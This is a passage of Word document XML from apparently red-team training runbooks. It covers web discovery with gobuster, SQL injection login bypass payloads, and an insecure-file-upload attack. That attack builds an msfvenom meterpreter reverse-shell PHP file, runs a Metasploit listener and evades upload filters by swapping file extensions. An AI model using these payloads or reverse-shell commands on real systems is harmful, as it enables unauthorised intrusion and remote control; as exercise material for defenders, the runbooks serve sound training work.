            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Look through the webpage for a login page or a search bar.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>This can be done manually or gobuster can be used</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">gobuser dir -u $WEB -w </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>“/usr/share/seclists/Discovery/Web-Content/raft-small-words.txt”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395"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Step 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282"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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1716" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="202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Test login page for SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Test the login for basic SQLi with the following payloads</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">‘ </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>OR 1=1; --</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>admin--</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>or use SQLmap</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">plus more </w:t>
            </w:r>
            <w:hyperlink r:id="rId2">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="InternetLink"/>
                  <w:kern w:val="0"/>
                  <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
                </w:rPr>
                <w:t>https://book.hacktricks.xyz/pentesting-web/sql-injection</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395"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Step 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282"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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1718" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="202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Perform PrivEsc once logged</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b w:val="false"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:highlight w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Once successfully logged in as admin, determine how to perform privesc and go from there.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>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shd w:val="clear" w:color="auto" w:fill="FF0000"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:t>Runbook 3</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="96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5"/>
        <w:gridCol w:w="497"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="2290"/>
        <w:gridCol w:w="1760"/>
        <w:gridCol w:w="1282"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="497"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Document Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>IRTx Red Run 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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V1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="417"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Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Dylan Wondal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Date Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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9/10/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411"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Attack Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Insecure File upload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Last Modified</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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9/10/23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="411"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Staff Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>1 Attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2290"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Skills Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="304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 xml:space="preserve">Msfvenom, metasploit, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>burpsuite</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1834" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1525"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 xml:space="preserve">Document </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8119" w:type="dxa"/>
            <w:gridSpan w:val="5"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">This is attack is </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">to target insecure/unsanatised file uploads. A malicious file will be uploaded that will create a reverse shell on the host machine for the attacker to connect to </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395"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Step 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282"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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1735" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="202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Create malicious file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="PreformattedText"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="msfvenom-command"/>
            <w:bookmarkEnd w:id="0"/>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve">msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.10 LPORT=9001 -f </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t xml:space="preserve"> -o </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>rev.php</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395"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Step 2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282"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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1837" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="202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Listen for shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="PreformattedText"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="1" w:name="listener-command"/>
            <w:bookmarkEnd w:id="1"/>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 192.168.0.10; set lport 9001; exploit"</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395"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Step 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282"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Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1716" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="202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Upload file</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Locate the upload page. If there is no sanitisation go to the php file and open it creating the reverse shell. If there appears to some security, change the file extension to .php.jpeg, intercept request and change back to .php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="48"/>
                <w:szCs w:val="48"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="395" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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Step 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>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Task</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1282" w:type="dxa"/>
            <w:tcBorders/>
            <w:shd w:color="auto" w:fill="EEECE1" w:themeFill="background2" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Complete</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1718" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2022" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:kern w:val="0"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
              <w:t>Connect to shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6340" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:widowControl w:val="false"/>
              <w:bidi w:val="0"/>
              <w:spacing w:before="0" w:after="160"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b w:val="false"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:highlight w:val="none"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:kern w:val="0"/>
                <w:shd w:fill="auto" w:val="clear"/>
